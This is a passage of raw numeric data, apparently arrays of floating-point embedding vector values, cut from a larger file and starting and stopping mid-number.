,0.012061255,-0.029955924,-0.001383401,-0.01122027,-0.0116649475,-0.030260427,0.000024513858,-0.0028803477,0.011556318,0.011278586,-0.0023972015,0.023706751,0.015074047,-0.002162828,0.010729481,-0.011327255,0.00967917,0.011460395,-0.022100696,-0.0073277066,0.012973403,0.0099794855,0.013621315,-0.0022845692,0.03881838,0.011194991,-0.0032875235,0.0076613477,-0.010431868,0.003986283,0.0010737396,0.012986508,-0.026344966,0.0013912196,-0.0237127,-0.0025835605,0.0051039327,-0.00814054,0.017723566,0.06556553,-0.051947165,-0.007862585,0.00919718,0.0060381154,-0.009590629,0.029256433,0.005638899,-0.015395135,-0.01902902,-0.0075425166,0.005074715,-0.0022704585,-0.040291894,-0.0070955595,-0.004942387,-0.016878042,-0.004049159,0.009229349,-0.020063518,-0.018166998,0.0030103317,0.00008574959,0.0013984105,-0.006240699,-0.021217773,-0.00071181776,-0.016161803,0.008173455,0.00154838,0.00813129,0.021296509,0.02218436,-0.020613035,0.00074189727,0.012188816,0.0037152,0.016558869,-0.0056299986,-0.01737819,-0.032897748,-0.009390894,0.0006578857,0.0077197324,0.009656818,-0.0040088133,-0.011950013,0.011454459,-0.0027952506,0.13440098,-0.016070038,0.015526306,0.009139527,0.012604036,-0.005929329,0.006886578,0.024981827,0.011169485,0.02518171,0.02658021,0.0025272775,-0.006995455,0.029559426,-0.015350027,-0.0065535074,-0.00028919315,0.12744157,-0.013506574,0.027112858,0.0007532447,0.009797101,-0.0027001046,0.0019573472,0.01280749,-0.06718165,-0.00087838114,-0.028319653,-0.011557058,0.01485262,-0.028200572,0.010799433,-0.0008790381,0.0026485804,-0.020710194,0.018133314,-0.004428733,0.0070823967,-0.012823162,-0.0069948263,0.028180894,0.0036096098,-0.0062260623,0.009694758,-0.03380149,0.00815115,-0.016910665,0.004995591,0.008686311,0.018288534,0.014259103,-0.003208,0.019137677,-0.008576654,0.009940733,0.014146364,0.011969947,-0.008744272,-0.0053010234,0.0033413223,-0.008988524,0.01730577,0.00082542154,0.035589397,-0.018229168,-0.0071205636,-0.0065789605,0.0022370364,0.014832509,0.010637806,0.017742338,0.017904459,-0.0021601373,-0.006056724,0.034243833,0.0012661701,-0.0014890821,0.019207994,0.019265402,-0.004103715,0.03539819,0.009362581,-0.013333619,0.012347435,0.0073900786,-0.010878517,0.01216925,-0.006121483,0.041636463,-0.018137896,-0.01204128,0.01574801,-0.010517617,-0.0023012536,0.013050084,0.0035279822,0.009744954,-0.0051213265,0.015596418,-0.029696591,-0.00814351,0.017659478,0.0076433583,-0.012848519,-0.021109508,0.01806924,-0.0044368813,-0.03341087,-0.000209939,0.005290988,0.011181811,-0.011367147,-0.0039850143,0.027409486,-0.005020158,-0.0064124255,-0.021230647,0.0034812947,-0.028252719,-0.0050783157,0.008085936,-0.012758239,-0.004627439,0.01126843,-0.010449693,0.017204612,0.0023978,0.030441608,-0.009527097,-0.0043077376,-0.016242478,-0.00927013,-0.00082966196,0.04222316,-0.011777441,-0.017158939,0.02133565,-0.03604087,-0.03416821,0.0028365776,0.0002579507,0.010133705,0.009440152,0.00928357,0.008119967,0.008062532,-0.0018767723,-0.0006791173],[0.0035230862,0.0141007155,-0.032904595,-0.003273323,-0.019131036,-0.024134805,0.013836083,0.017797945,-0.0017650456,-0.007243568,-0.0057789935,0.013699436,0.01500768,0.017385263,-0.010864174,0.0053496226,0.005964716,-0.0013924391,0.008183967,-0.015789714,0.012269463,-0.0037755533,0.014351241,-0.009995686,0.010422535,0.015319876,-0.0013337982,-0.004205914,0.0055290917,0.008688131,-0.0036942214,0.018177226,0.015848864,0.008658555,0.009696899,0.002221136,-0.010550172,-0.016203687,0.00083607447,-0.0033012843,-0.012384875,0.008845569,0.011482898,0.040807437,0.004523536,0.008753318,-0.002441632,0.01126327,-0.0036355637,0.0060202796,0.009805324,-0.002434233,-0.018687764,0.0144739915,-0.009956764,0.029546378,-0.0041129584,-0.036718108,0.0132907815,-0.028493624,-0.011673433,0.004520656,0.009887272,-0.0074917693,0.05065837,-0.014230753,0.008613338,-0.008555435,0.0025125605,-0.026565295,0.0019953046,-0.0087409,-0.0015429757,-0.015858049,0.024810504,0.028347736,0.00082164415,-0.017777381,-0.021285435,0.0002801013,-0.0015695817,-0.010351396,-0.00493987,-0.009239882,0.02941702,-0.01492436,-0.03105761,0.011337068,0.007249771,-0.01352532,0.0016507253,0.015290269,0.0061104465,0.007237499,-0.027350774,0.0034715752,0.008160549,-0.004890044,-0.0042385384,0.008158413,-0.013766567,-0.008855591,-0.021576704,0.009727782,0.019791441,-0.018648153,0.0059895893,-0.0051712133,-0.00013060692,-0.009605639,0.0015743831,-0.008062441,-0.0035583002,-0.005593421,-0.0070152655,0.00038111093,-0.0030386923,0.009875288,0.016996454,0.0021191132,-0.018968672,0.029915255,-0.0008765092,-0.0014263068,-0.006823891,0.002477712,0.0058462317,0.015571074,0.011462055,-0.012000042,0.001242066,0.0028748915,0.00037947824,-0.010687679,0.013597362,-0.0026233683,0.010573092,-0.006806153,0.004035166,-0.022284338,0.021409836,-0.0019437156,0.003985379,0.0018686391,0.027121067,0.001380557,-0.002025804,0.017808354,0.015402446,-0.007635056,0.009146103,-0.014379517,-0.009065747,-0.015503465,0.0125978915,0.029570844,0.011505969,-0.011022433,-0.027201029,-0.0073340344,-0.019459521,-0.008919423,0.017145239,-0.0106209135,-0.027839556,-0.033778016,-0.008145157,-0.0038564033,-0.015653126,0.021299265,0.02798465,0.02463931,0.019328961,0.008264385,0.00923742,0.023195,-0.010044472,-0.003552754,0.0066513405,-0.0011834089,0.019827334,0.0075408793,-0.0075274464,0.007168621,0.00979689,0.03183199,0.020426748,0.0058040093,-0.017773172,-0.0052162195,0.020051094,-0.020483071,-0.006034815,0.002437116,-0.026205448,-0.030071627,-0.004297803,0.08106413,-0.015320254,0.009589331,-0.020505326,-0.0013748974,0.0054623587,-0.019934054,0.0011539704,-0.0066868477,-0.013658561,-0.011124112,0.016585967,-0.008304183,0.009720746,-0.012287032,0.0075710844,0.0053514806,0.0012264167,-0.06332932,0.02519907,0.022479514,0.0073108072,0.0027934287,-0.0034384353,0.014626577,0.0045951586,-0.020188298,-0.0050072023,-0.0148045765,0.017840078,-0.0036769884,-0.003535951,-0.026378084,0.0111802975,0.018180514,-0.018360008,-0.029381685,-0.00053275545,-0.009143895,-0.00076401647,-0.011974253,0.014593516,-0.010595901,0.0012495441,0.0026367202,0.027533643,0.034480933,-0.010821647,-0.0057962346,0.025085794,-0.0073780436,-0.017885018,0.021647671,0.019705893,-0.01064234,0.018726207,0.012077928,0.005300812,-0.0026123382,0.008332159,-0.0023575616,0.011659004,-0.0041579106,0.022259943,0.022213215,-0.020284804,0.021755738,0.020948758,0.00061302475,0.014981819,-0.03939759,-0.019612448,-0.013686592,-0.024844127,-0.002518644,0.0076824357,-0.008271022,-0.0067070643,-0.0064825914,0.0016870159,0.008286048,0.005230896,-0.012894957,-0.005027615,0.0094785085,-0.017933896,-0.023698967,-0.0034781971,0.001966043,-0.012626603,-0.007840872,0.03658216,-0.0115820505,0.004383923,0.009088703,0.013653786,0.0059311334,-0.019426841,-0.013052577,-0.01022177,0.010149024,0.011685625,-0.026455976,-0.009871399,-0.02318211,0.019452719,-0.01444347,-0.014654414,-0.017695315,0.0024921398,0.03886759,-0.02243736,0.018284122,-0.024651183,-0.013447852,-0.011496646,-0.009330346,0.0102630295,-0.0062485244,-0.012661844,-0.018240852,-0.013689027,-0.0072527016,0.024982374,-0.015494332,0.019200481,-0.027912667,-0.033166133,0.013167899,0.0014746276,-0.015455804,-0.0017684005,-0.00023703052,-0.010243357,0.0060343863,0.04101086,0.02270959,-0.014626522,0.02322459,-0.013065258,0.017902682,0.010310643,0.023065176,-0.023127446,-0.0032954898,-0.023757197,-0.0020533965,0.0040526525,0.003721973,-0.006793783,-0.00010992655,0.018060835,0.011459923,0.038546186,-0.010476132,-0.004364055,-0.0021961262,0.0015392799,0.004599592,-0.010387353,-0.01899701,0.00474569,-0.0015063903,0.021047516,-0.0069648386,-0.010773514,0.0056507224,0.05960542,-0.011928797,-0.011960743,-0.006098099,-0.006574493,0.0018188657,0.03352989,0.015606596,0.014740493,-0.010759858,-0.01275901,-0.016744824,-0.0058773253,0.016377458,-0.023434369,0.014498896,-0.012709749,-0.020744128,-0.020036865,-0.010920041,0.029576754,-0.03128547,0.010176348,0.00080372405,0.00069425575,0.040279064,-0.00039564157,0.0027658192,0.0004889014,-0.03176371,-0.00025638865,0.005877557,-0.0067761154,0.012572853,-0.04957022,0.013292694,0.01484799,0.006651021,-0.02656437,-0.008006403,0.01769944,0.019390063,-0.014822464,-0.015040111,-0.011142253,0.036793847,-0.002556384,-0.000015125558,-0.0074156495,0.017203026,-0.0017539138,0.016356453,-0.020258421,-0.0018348654,0.0021462967,0.02433292,0.0043920665,-0.037817847,0.054597918,0.016846558,0.0143555,0.01390814,-0.0050343107,-0.0135494,-0.0060903616,0.03779971,-0.018784614,-0.0008267487,0.007539997,-0.022943627,0.0060066883,0.019580279,-0.026809348,0.013562063,-0.0022719135,0.011190735,-0.021289922,-0.0013425783,0.0030215455,0.033497486,0.003568491,-0.0077326274,-0.008688003,0.0008301706,-0.011931674,-0.003034485,-0.0007519197,-0.01563933,-0.009284083,0.006941465,0.010089904,0.0054517724,0.019035192,0.021077802,0.03356137,0.021591773,0.019292109,0.023494257,-0.02007058,0.026823295,0.0015341169,0.0035422405,-0.005173237,-0.010281571,-0.015326546,-0.006951329,0.021364046,-0.011615947,0.007548818,0.030065201,-0.01884977,0.016187454,-0.0044194343,-0.021342749,0.021145083,-0.03288051,0.0003269583,-0.016245209,-0.0138036255,-0.0056424327,0.013122752,0.012324089,-0.0012858636,0.020542728,0.0068412274,-0.017894765,-0.014750565,-0.02446976,-0.0013923985,0.011415112,0.0027702134,0.022398489,0.018031264,-0.028969584,0.025789449,0.013870943,-0.0046648635,-0.04310644,0.041091308,0.017727032,0.007827357,0.016403547,0.025228025,-0.0024330253,0.011549756,0.0244145,0.03189766,-0.004627455,-0.026068158,-0.0026407277,-0.0010994694,0.0019929078,0.020776417,-0.0014032269,0.005924583,0.006764226,0.0420383,-0.024400199,-0.008810234,0.0027549579,0.0216488,-0.020106884,-0.008679,-0.0050664623,-0.0084962705,0.03280897,0.005870613,0.0613318,-0.022123154,-0.023440389,-0.007246506,0.013286024,0.003180858,-0.006589118,0.018733628,-0.03044293,0.000943122,-0.0030704325,0.02214771,-0.0057634288,-0.0035756319,-0.0066666366,-0.004036965,0.009328433,0.019985622,0.00286852,0.0016387923,0.0042810286,0.0005923713,-0.0068733217,-0.022452626,-0.008667014,0.013200371,0.024703605,0.00547365,-0.011468322,-0.010574599,-0.029433198,0.004575636,0.02176477,0.0068685734,0.00854857,0.0019013779,0.011519265,0.006582635,-0.01981132,0.02836522,0.0038410614,-0.001934256,0.010468157,0.030265799,0.0323182,-0.015341208,0.016808089,0.016294375,-0.002222369,-0.0051627024,-0.0077450085,0.017768899,0.019924805,0.013310485,-0.027119655,0.0018043587,0.004954699,0.012413286,-0.019779311,0.020312428,-0.018945165,0.00011005114,-0.001797141,-0.011578307,-0.0141302,0.0013455625,0.0059429132,-0.009666226,0.0034311996,-0.018653883,0.009289508,0.014636871,-0.02713448,-0.013459088,0.0150816245,0.0031061205,-0.007487817,0.0174051,0.012937734,-0.008967261,-0.008439883,0.010851621,-0.005358268,-0.012233548,0.00826957,0.0051733977,-0.0072821765,-0.010305053,0.01539368,-0.01602218,0.012578566,-0.02016805,0.011617567,0.01199725,0.0125168,0.018368538,-0.0052297455,-0.018437035,0.0019119695,0.013539896,-0.039116595,0.0035108519,0.007749133,0.033495102,-0.021120435,-0.011859452,0.00040687664,-0.006368179,0.003665675,-0.027512161,0.018178483,-0.06331666,-0.001338906,0.0064215614,0.0042735715,-0.011591837,0.025223121,0.018388925,0.0012704761,-0.0024858885,-0.0012857527,-0.0032870185,-0.007709581,-0.014566485,-0.0021267594,-0.000923526,0.011573638,-0.037365805,-0.019781383,-0.012812311,-0.047098495,-0.027452607,0.045181975,0.0036240884,-0.004448153,-0.0019690443,0.028710721,-0.009199487,-0.012397028,0.009052649,-0.021662535,0.00282718,0.010555211,-0.032660466,0.022744989,0.011783655,-0.0029285788,-0.00896787,-0.019327652,-0.008168662,-0.0016377391,0.012730534,-0.018704792,-0.0047323345,0.022628183,-0.0031470463,0.030889122,-0.000349767,0.0128198005,0.014193436,0.03933247,0.01249519,0.0051503684,-0.006447453,0.002751855,-0.011830546,-0.009496901,0.013157542,0.0368298,0.010810395,0.021085076,0.025017988,0.0015499971,-0.005394244,-0.023536805,0.003501226,0.04133551,0.023742622,-0.006657861,0.013334728,-0.018351,0.019650541,0.0065043704,0.0076635536,-0.0073959427,0.030792778,0.013604253,0.001370319,0.04460588,-0.00475782,0.004845953,-0.021288805,-0.02040895,-0.01683568,0.026768092,0.024388647,-0.007476152,0.02049744,-0.010473202,-0.0026443345,-0.010313874,-0.021618025,-0.0060593975,-0.008055865,-0.02075642,-0.018663196,-0.009728357,0.008493847,-0.042838983,-0.0029186616,0.04223177,0.0014201765,0.0059761135,-0.01873091,-0.010782654,-0.0027890936,-0.022709655,-0.036549743,-0.011364192,0.0072663003,0.016826557,-0.03685577,-0.0064801928,0.010706008,0.006664635,0.0023394516,0.015339734,-0.025979407,-0.0029178127,0.000964911,-0.024220977,0.024332691,0.017902356,0.014220647,0.0056152595,-0.0050286646,-0.004980472,-0.012056108,-0.0101080695,-0.020168932,-0.0012582606,0.009452474,-0.0055456194,0.0054595503,-0.015205409,-0.008534237,-0.013486884,0.00870333,-0.04182296,-0.014037351,-0.008717584,0.023640573,0.014948682,0.03661076,-0.019500751,0.023899248,0.016783409,-0.023286438,0.0031192722,-0.005374805,0.010505995,0.024358863,0.04732541,-0.0138951475,-0.03435872,-0.010534217,0.012760817,-0.014516709,0.010088168,0.009619801,-0.013294097,-0.023324087,-0.019108566,-0.0018933852,-0.021090161,0.015028137,-0.00010370613,-0.024399497,0.027468525,-0.01577171,0.030580876,0.008283133,0.0005510425,0.0103445165,-0.0035148608,0.013150816,-0.036921125,-0.015777638,0.023517733,-0.01751861,0.011910068,0.017125135,-0.031741254,-0.0121618565,-0.02531837,0.0017618359,-0.013170607,0.01479023,0.007884518,0.00190379,-0.026897162,0.012899286,0.00026063848,0.022793807,-0.025741367,-0.012633572,-0.007952363,0.0006172809,0.013497488,-0.004080654,-0.022492193,0.023728745,0.0032784366,-0.009126637,0.012763841,-0.00004977227,0.020666948,-0.003979024,0.015156558,0.010045068,-0.02686113,0.013175499,-0.008813305,0.006032399,0.022332277,-0.0012973079,-0.019920606,-0.0023773373,-0.026860842,-0.019558663,-0.013981242,-0.0053828247,-0.022144405,0.0046800957,-0.0010526847,-0.0017078822,0.007029899,0.009966483,0.028541531,-0.0053831604,-0.012069379,0.021890901,-0.004411623,-0.031873766,-0.023659868,-0.010966625,-0.006059111,-0.009405731,0.014831144,0.014804793,0.019504216,0.03425341,-0.0024470396,-0.016994886,0.010746459,0.009553101,-0.00023402489,0.01778481,0.0055750646,-0.01620004,-0.0015752603,0.028208572,-0.039326735,-0.0040313005,0.00093754433,-0.01012477,0.0017355054,-0.030938482,0.003259741,-0.003985719,0.016764536,0.020182667,-0.010561526,-0.000063266096,-0.017099718,0.019473417,-0.0020777571,0.0018606806,0.012607418,-0.0007191289,0.0013078037,-0.012084806,0.004878944,-0.008406683,0.016567368,-0.017125482,-0.0045870785,0.0047712647,0.0074940687,-0.000081969076,-0.0024311994,-0.012289586,0.024752423,0.030647097,-0.007727553,0.0054044323,-0.031024268,-0.022879524,0.011981509,0.0024670134,-0.023727378,-0.0044344906,0.035098363,0.025228115,-0.013056496,-0.0032677222,-0.035220515,-0.057896335,0.015707912,-0.022373071,-0.008636814,0.0025022654,0.00026698288,0.0129343895,0.021142974,0.033418898,-0.010268483,0.0070042666,0.005423573,-0.00053150835,0.0019779387,-0.0015960754,-0.005366848,-0.029077468,0.042287145,0.02583995,0.020873891,0.0021059287,0.0062047276,0.018064061,0.0031557996,0.030956458,0.013944519,0.00066494825,-0.027155424,-0.02843237,0.010788739,-0.009521939,0.026805496,0.0064841164,-0.008922154,-0.008725367,-0.023551108,0.0027525402,0.013193308,-0.009501577,0.019350158,-0.013848802,-0.005799915,0.0028784084,0.034416072,-0.010851563,-0.019307898,0.0010492527,-0.005800359,-0.0030889083,-0.002822263,0.0033709286,-0.00028825045,0.0014787861,0.035030935,0.00139847,0.024979794,0.010585632,0.017569553,0.026928606,-0.00023502365,0.0042745154,-0.0054806997,0.009804191,0.03736111,-0.015059318,-0.019290533,0.012792092,0.023602944,-0.010514391,-0.012846957,-0.028361352,-0.011141083,-0.0076453,-0.0059965206,-0.010091294,0.008169153,-0.0060429475,-0.01182228,-0.0043976298,-0.01084334,-0.016566584,0.015963826,-0.011196778,-0.007071637,-0.01929709,-0.0119142,-0.003710222,-0.002806579,-0.005634597,-0.012380248,-0.018768575,0.0060426835,-0.0082474,0.014343323,-0.006942152,0.027299833,-0.0015489693,-0.018914642,0.0071946885,-0.014825683,0.02485394,-0.008953333,-0.003983956,0.031200929,0.00018432118,0.0006699809,0.007362964,0.02064379,0.02234841,0.02021988,-0.01704121,0.013704375,0.0023579577,0.031018436,0.023920001,-0.002506266,-0.012327798,0.02280991,0.045279805,0.022859655,0.014991634,-0.004545298,0.018792596,-0.0023205439,0.011455494,-0.0034580354,0.01846737,-0.0041501466,-0.013132833,0.008311538,-0.003856608,0.02320536,0.00064625544,-0.005295259,0.0159804,-0.000078081925,0.004838163,-0.043080594,-0.009555434,0.0026534286,-0.016127147,-0.009149123,-0.0063275653,-0.0033519615,0.014059533,-0.047356296,0.0128722675,-0.0047131446,0.0072432756,0.013518035,0.0021237822,-0.002197709,0.013005296,0.0064726407,-0.007797393,0.009683498,0.00559867,-0.010170708,0.0012141564,0.016638422,-0.008165231,-0.029752595,-0.013382449,0.0063350094,-0.027116958,0.011044555,-0.014757152,0.0069056,-0.00004588337,-0.002444614,0.009197981,-0.008147173,-0.02475942,0.029347345,0.005308902,-0.000583218,0.022559406,0.012119075,0.0054652994,0.012302229,-0.0019319252,0.04150368,-0.0037692671,0.009583947,-0.000045549936,-0.0101975445,-0.0044787154,0.008519082,-0.013660946,-0.02601524,-0.005926425,-0.020951778,0.02093228,0.000014785213,-0.013768906,0.03531775,-0.01923584,0.04999772,-0.005053528,-0.009535288,-0.00072170695,0.019114567,0.015907157,0.016585661,-0.022977855,0.024451025,0.010973243,-0.04684421,-0.017864218,0.0019133898,-0.009738233,-0.022231383,0.0105264345,-0.020088222,-0.015542372,-0.0020847688,-0.021541651,0.0008019492,0.015468033,-0.010706622,0.017488025,0.032925043,0.014956293,0.0005390032,0.0026857378,-0.013847671,-0.0036128103,0.006163296,0.0061540836,-0.006511123,0.009366043,-0.0000061288797,0.021532755,0.010338286,-0.025223207,0.004468681,-0.011044331,0.022287114,-0.0035261903,-0.00238313,-0.009506297,0.0011230642,0.025708484,-0.018148603,-0.005965774,0.031061253,0.004563381,0.02109436,0.013418889,0.0132471165,-0.011854998,0.009631798,0.01954062,-0.0134157,-0.015220283,-0.006135834,-0.022755222,-0.005537304,-0.010280339,0.00022579322,-0.010601009,-0.0032646684,-0.020538691,0.007255586,-0.00061251083,0.00481435,-0.0024557288,0.004754114,0.020456152,0.0125876,0.005496822,0.011749678,0.0020739231,0.0071763736,0.015138672,-0.0020533395,-0.023220483,-0.012668263,0.009650988,-0.0038920597,0.008641953,-0.009394724,-0.0055412087,-0.02819351,0.0009569948,0.022934968,0.01459043,-0.005566881,0.008327527,0.0024316579,-0.017537156,-0.029985955,0.012444822,0.014410357,0.000782501,-0.0069291797,-0.011051069,-0.004512198,-0.015645325,0.0041533895,0.06389233,0.004021588,0.0016632891,0.00023698619,0.030024035,-0.015024524,-0.0013031295,0.0020516654,0.009472547,-0.020957714,-0.01741286,-0.02147176,0.011063142,-0.0076621217,0.010456683,-0.0063183717,-0.0047113965,0.006683421,0.008254823,0.022730624,0.0008719592,-0.0006665931,0.019976757,0.0078088255,0.003648252,0.022844998,0.023884987,-0.008995573,0.034027535,0.00789654,-0.0039985036,-0.033595856,0.017269257,0.026619464,-0.013716885,-0.010016187,0.024400366,-0.00029859456,-0.03236554,0.019007437,-0.008064752,-0.011853417,0.039189905,-0.00077602407,0.008750581,-0.012676306,-0.008239231,-0.021971576,0.0131174065,-0.013389575,0.016826434,-0.001947208,-0.016117943,0.0047050193,-0.0011335466,0.03689657,0.009834443,0.042464074,0.015429034,-0.014560144,-0.0010289493,0.013506747,-0.003160014,0.00321419,-0.0092023,-0.00046280766,0.00016568675,-0.020493785,0.028432203,-0.020420374,0.0007349788,-0.0009897047,-0.0027617328,0.018939286,0.000781125,0.020572174,-0.003196677,-0.004931797,-0.010306614,-0.008463272,0.00023399603,-0.0039989287,0.03172785,0.011388799,-0.01589091,-0.0024894767,-0.0022771289,-0.002248489,0.051567744,0.021342734,0.009731757,-0.025018545,0.014352716,0.01293745,0.010954681,0.015484983,-0.011830428,-0.0075486545,-0.01996746,0.0052899607,0.013870198,0.0010928962,0.026883261,-0.024646066,0.01111601,-0.01317495,0.006894436,-0.022972262,0.00082687975,0.038456757,0.008392064,0.012986044,-0.0047809496,0.021188984,-0.0025133335,0.0025552094,0.02139284,-0.0155769335,-0.017271757,0.013195701,0.01867933,0.020246452,-0.016025111,-0.055315766,0.005549601,0.1099039,-0.015776545,-0.0046735206,0.005886099,0.0033632126,0.0057301326,-0.10744918,0.013579364,0.02097839,0.0053054797,0.005709307,-0.013337175,-0.01596747,0.006162471,0.013013586,-0.0065623024,-0.015471115,-0.0035651121,0.01826553,-0.011859597,-0.003576007,0.0071003675,0.005535377,-0.008172311,-0.036431845,-0.0061850995,0.004290906,-0.0029692743,0.0066206907,-0.02287139,0.0054594036,0.011489273,0.02109934,-0.0020906276,-0.019899692,0.02006995,0.0074805426,0.014298294,0.000013843155,-0.02833338,0.0055878963,-0.015651114,-0.01880761,-0.041642983,-0.15940237,0.015718514,0.009287031,-0.038686518,0.015749415,-0.005132058,0.011534553,-0.0050723865,0.014144444,0.0027983736,-0.008991317,0.014387345,0.0015523368,0.008992345,-0.027377935,0.005912603,-0.00742416,-0.00056780427,0.0011090584,-0.01008665,0.008158117,0.004737081,-0.015025373,-0.014822365,-0.0143998,0.008402295,0.008705995,0.031014081,0.011864837,0.016736954,-0.025822178,0.011928858,-0.009120461,-0.0018861284,0.00906417,-0.006668375,-0.0012688834,0.012781453,-0.01076819,0.01629617,-0.03074775,0.003573121,-0.007995842,-0.010107178,0.003495316,0.0036023955,0.0025894535,0.016103996,0.026269894,0.0051558437,0.012716887,0.009793512,-0.020800382,0.017262274,-0.013756071,0.007913116,-0.00029281963,-0.04119257,-0.020759566,0.010885322,-0.0017577293,-0.016686631,-0.008922661,0.006539737,0.023108263,-0.0024156235,0.01332665,-0.023712398,-0.008903717,0.011972172,0.0003627009,0.0032936253,-0.006025087,-0.019690858,0.016392889,0.00446997,0.0028325634,-0.0038097731,0.013014284,-0.011277211,-0.0047247717,-0.010337029,-0.00076597964,-0.03892972,0.021969736,-0.0075472365,0.00560893,-0.020102954,-0.0023968052,0.0074775955,0.033416916,-0.017860852,0.008527773,0.006735631,0.0034888363,0.013395015,0.040335163,0.0024508636,-0.015810447,0.020971712,-0.0053985394,-0.016378656,-0.010289754,-0.0004079537,-0.02305571,0.005679254,0.01228751,-0.0062511354,-0.018420883,-0.010408297,-0.0015527569,-0.012687612,0.018728184,-0.0061400435,-0.031299904,-0.018158514,-0.0013330778,0.00042834558,0.00226606,-0.012498309,-0.035499047,0.0072583477,0.0105615305,0.019038457,0.04392029,0.0023715827,-0.0040751416,-0.0021716023,0.008021079,0.0012855664,-0.04040923,0.03555744,0.0018338822,0.00402559,0.00011411481,-0.006476187,-0.025435057,-0.0017844451,-0.039244026,-0.0031369186,-0.0017306213,-0.004018369,0.013127974,-0.00757467,0.0204853,-0.017233538,0.025829447,-0.0031142076,0.01882973,0.010976468,0.0021937776,0.02460365,-0.023371758,-0.026671326,0.01991542,0.062201343,0.00606646,-0.010212943,0.011661895,-0.0016926546,0.016583472,0.017588878,0.003678695,-0.0076586083,-0.01852776,-0.03728654,-0.007073158,-0.0010735912,0.0054081376,-0.020401713,0.015742656,0.016292997,0.006226766,-0.016915342,-0.002383731,0.013277257,-0.0074448516,-0.016509393,0.012645022,0.005805971,0.006087587,0.017048934,-0.009649221,-0.0024312008,0.0002574381,-0.01039106,-0.016742844,-0.018650884,0.011105253,0.013292741,-0.021562472,-0.015080422,0.008608629,-0.0030207555,-0.019549176,0.0015354326,0.00655013,0.0054018674,-0.023930367,0.005549814,-0.04277859,-0.014800561,-0.011211486,-0.0064174645,0.017169354,0.0064833444,0.010346399,-0.0043060523,-0.013462049,0.009616384,-0.02097678,-0.010726154,-0.0062205805,-0.0013183183,-0.0050812373,0.01703024,-0.014940339,-0.026131578,0.005472165,-0.015514883,-0.0034450393,-0.009296318,-0.007988912,-0.008189963,0.016330793,-0.018178817,-0.009461019,-0.019751087,0.012721047,0.008931758,-0.023962686,-0.0027510994,-0.008715004,-0.012089075,0.01278928,0.019701041,0.016173692,-0.002700137,-0.0049487962,-0.0029877154,-0.037757006,-0.004346759,0.041098703,-0.03410768,0.012431368,0.013503457,-0.010916914,0.023348734,-0.010034621,0.026884181,0.024877502,0.013924554,0.0034801923,0.034836214,0.0024069936,0.018167345,0.021285493,0.0012767469,-0.043525748,0.0036311112,-0.025206128,0.0024218154,-0.0018634432,0.03146911,0.00042658744,0.0025380875,-0.018402373,0.008153537,-0.031137036,-0.008615141,0.06233588,0.008881794,0.013275504,0.030559447,-0.0074931933,-0.013969709,-0.00061309594,0.015326052,0.0063582337,0.023521027,-0.017538104,0.01897988,-0.00005196651,-0.030683596,0.017063497,-0.0035769113,0.026379758,0.0075069973,-0.011183573,0.0017262672,-0.009032867,0.016784372,0.020829055,-0.009244401,0.036982566,-0.014910677,-0.010690314,0.0026692927,-0.009424432,-0.026894413,0.0057034674,0.018730182,-0.0055117384,-0.023779111,0.003256099,-0.03016018,0.020361045,-0.006708323,-0.0007192322,0.010306514,0.025229603,-0.011017653,-0.011559345,-0.019541118,-0.017568473,0.020212393,0.03203018,0.019088248,-0.007383822,-0.027644517,0.021408182,0.036540885,-0.012641542,0.006592504,0.0009065549,-0.007988296,-0.0056537143,-0.001566167,-0.00943806,-0.011103404,-0.0007746247,0.0048079696,0.011541214,-0.010505882,-0.008250359,0.010580628,0.010144804,0.005450683,0.0035584709,-0.020015262,0.009950144,-0.009692976,0.020775257,-0.010462952,-0.00037160184,-0.018261094,-0.016357621,-0.008534196,-0.0032931967,-0.022931827,-0.018135477,0.03311491,-0.039228633,0.0027824088,-0.0036154713,0.0057284115,0.04577621,-0.031277947,-0.0018020329,-0.004181164,0.00013874935,-0.017180713,-0.039052732,-0.007761052,-0.0053308047,-0.017980933,-0.0038424635,-0.0044827354,0.019857839,0.0063557783,-0.02595618,0.014380561,0.017668607,-0.005926969,-0.029494852,0.021034345,-0.016549343,-0.002378877,-0.0008254855,0.0023654583,-0.019281534,-0.028074468,0.050475527,-0.008483303,-0.013637999,-0.032383688,0.032648154,0.012960415,-0.015596169,0.018815946,-0.007396909,-0.01131244,0.0049138432,-0.022115529,-0.0017091442,-0.0021890372,-0.015067137,-0.008967569,0.019776918,-0.012888196,-0.01065412,0.002638998,0.003071399,-0.006594277,0.0139619885,-0.0007285075,-0.017358322,-0.055417746,-0.03416315,0.021283159,-0.01945286,0.022316968,0.013987383,-0.015055332,-0.029553374,0.0029206206,-0.042095035,0.008374712,0.0031790778,-0.006042467,-0.003695628,0.000107739215,0.015586856,0.002496747,-0.0026348797,0.020661231,-0.0031221854,-0.033550736,-0.008631457,-0.0048172777,-0.025362765,-0.0030553096,0.0051435595,-0.0042731552,0.03143969,0.013452685,-0.029890113,0.025884757,0.0034181753,0.009248552,0.0049456777,0.00067488605,0.02507591,0.007063788,-0.028673297,-0.01737329,0.020581082,0.011452945,-0.021668578,-0.008654383,-0.011755408,-0.005637679,-0.0058343434,0.023029413,0.011646728,0.018180186,0.00339911,-0.004813753,0.016684812,-0.009012928,-0.005128109,0.013356421,-0.013144679,0.014044098,-0.002170369,-0.012768268,0.011236945,0.018550616,-0.00610072,0.014237941,-0.0015861824,0.020660674,0.046287693,0.0035068383,0.018705303,-0.004151595,-0.011126744,-0.0027623603,-0.013864196,-0.030820169,0.023158941,-0.020772139,-0.02010849,-0.008862942,-0.020242041,0.0030700122,-0.024261197,0.0085029425,-0.10281694,0.00050038326,-0.009674048,-0.015250688,-0.0017514385,-0.014234458,0.009879349,0.021104295,-0.007440829,-0.046441283,-0.017031161,0.026895497,-0.0015273459,-0.0049132355,-0.021662643,0.008347469,-0.019422062,-0.011767362,-0.013503534,0.008417395,0.015549944,-0.010533365,0.01998281,-0.0040638,-0.00054850127,0.009474328,0.009217756,0.019136837,-0.00097321306,0.017463658,0.00017152911,0.0034561984,0.022812802,0.023087086,0.0069112345,0.009412317,0.007660485,-0.0011973024,0.004200851,0.014405928,-0.0033212951,-0.019768279,-0.0014661058,0.006318556,0.0227083,0.009335701,0.0033083793,0.028010601,0.026340673,0.012535847,-0.017410394,-0.007443873,0.014994269,-0.0003471485,-0.0076532704,-0.016203891,-0.003707146,-0.013099885,0.017716711,0.006804351,0.007732428,0.014692662,0.00452067,-0.028864546,0.014910465,0.027598152,0.014406807,0.008410144,-0.03427186,0.0067039365,0.0014263627,0.0169525,0.0010521382,0.001213816,0.0070694927,0.007935791,-0.00079364434,0.0015753175,-0.027405486,0.01828532,-0.02294655,-0.007263703,-0.0027059605,0.019294683,0.007983246,-0.